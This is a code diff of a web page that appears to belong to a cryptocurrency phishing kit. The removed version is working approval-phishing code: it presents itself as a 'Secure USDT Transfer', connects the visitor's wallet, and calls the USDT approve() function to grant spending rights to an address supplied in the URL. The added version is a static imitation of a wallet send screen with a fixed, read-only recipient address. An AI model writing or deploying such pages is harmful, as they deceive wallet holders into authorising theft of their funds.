--- a/index.html
+++ b/index.html
@@ -1,54 +1,100 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-  <title>Send USDT - BEP20</title>
-  <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js"></script>
+  <meta charset="UTF-8">
+  <title>USDT Transfer</title>
+  <style>
+    body {
+      margin: 0;
+      background-color: #111;
+      color: white;
+      font-family: Arial, sans-serif;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      padding: 40px 20px;
+    }
+
+    .container {
+      width: 100%;
+      max-width: 400px;
+      background-color: #1e1e1e;
+      padding: 25px;
+      border-radius: 15px;
+      box-shadow: 0 0 15px rgba(0,0,0,0.6);
+    }
+
+    label {
+      font-size: 14px;
+      margin-bottom: 5px;
+      display: block;
+    }
+
+    .input-group {
+      background: #2a2a2a;
+      border-radius: 10px;
+      display: flex;
+      align-items: center;
+      margin-bottom: 20px;
+      padding: 10px;
+      color: #ccc;
+    }
+
+    .input-group input {
+      background: transparent;
+      border: none;
+      color: white;
+      flex: 1;
+      font-size: 16px;
+      padding: 5px;
+      outline: none;
+    }
+
+    .input-group .right {
+      font-size: 14px;
+      color: #0f0;
+      margin-left: 10px;
+      cursor: pointer;
+    }
+
+    .amount-hint {
+      color: gray;
+      font-size: 12px;
+      margin-top: -15px;
+      margin-bottom: 25px;
+      text-align: right;
+    }
+
+    .btn {
+      width: 100%;
+      padding: 12px;
+      border: none;
+      border-radius: 25px;
+      font-size: 16px;
+      font-weight: bold;
+      background-color: #333;
+      color: gray;
+      cursor: not-allowed;
+    }
+  </style>
 </head>
-<body style="text-align:center; font-family:sans-serif">
-  <h1>🔐 Secure USDT Transfer</h1>
-  <p>Recipient Wallet: <b id="receiver"></b></p>
-  <button onclick="connect()">🟢 Connect Wallet</button>
-  <br><br>
-  <input type="number" id="amount" placeholder="Enter USDT Amount" />
-  <br><br>
-  <button onclick="approve()">Approve USDT</button>
+<body>
+  <div class="container">
+    <label>Address or Domain Name</label>
+    <div class="input-group">
+      <input type="text" value="0xB7333cd4E52D665156eA00c6..." readonly>
+      <div class="right">Paste</div>
+    </div>
 
-  <script>
-    let signer;
-    let provider;
-    let userWallet;
+    <label>Amount</label>
+    <div class="input-group">
+      <input type="number" placeholder="USDT Amount">
+      <div class="right">Max</div>
+    </div>
 
-    const usdtToken = "0xdAC17F958D2ee523a2206206994597C13D831ec7"; // Real USDT contract (for education)
+    <div class="amount-hint">= $0.00</div>
 
-    const params = new URLSearchParams(window.location.search);
-    const receiver = params.get("address");
-    document.getElementById("receiver").innerText = receiver;
-
-    async function connect() {
-      provider = new ethers.providers.Web3Provider(window.ethereum);
-      await provider.send("eth_requestAccounts", []);
-      signer = provider.getSigner();
-      userWallet = await signer.getAddress();
-      alert("Connected: " + userWallet);
-    }
-
-    async function approve() {
-      if (!signer) return alert("Connect wallet first!");
-
-      const tokenContract = new ethers.Contract(usdtToken, [
-        "function approve(address spender, uint256 amount) public returns (bool)"
-      ], signer);
-
-      const amount = document.getElementById("amount").value;
-      const amountInWei = ethers.utils.parseUnits(amount, 6); // USDT has 6 decimals
-
-      try {
-        const tx = await tokenContract.approve(receiver, amountInWei);
-        alert("Fake Approval sent:\n" + tx.hash);
-      } catch (err) {
-        alert("Transaction failed:\n" + err.message);
-      }
-    }
-  </script>
+    <button class="btn">Next</button>
+  </div>
 </body>
 </html>
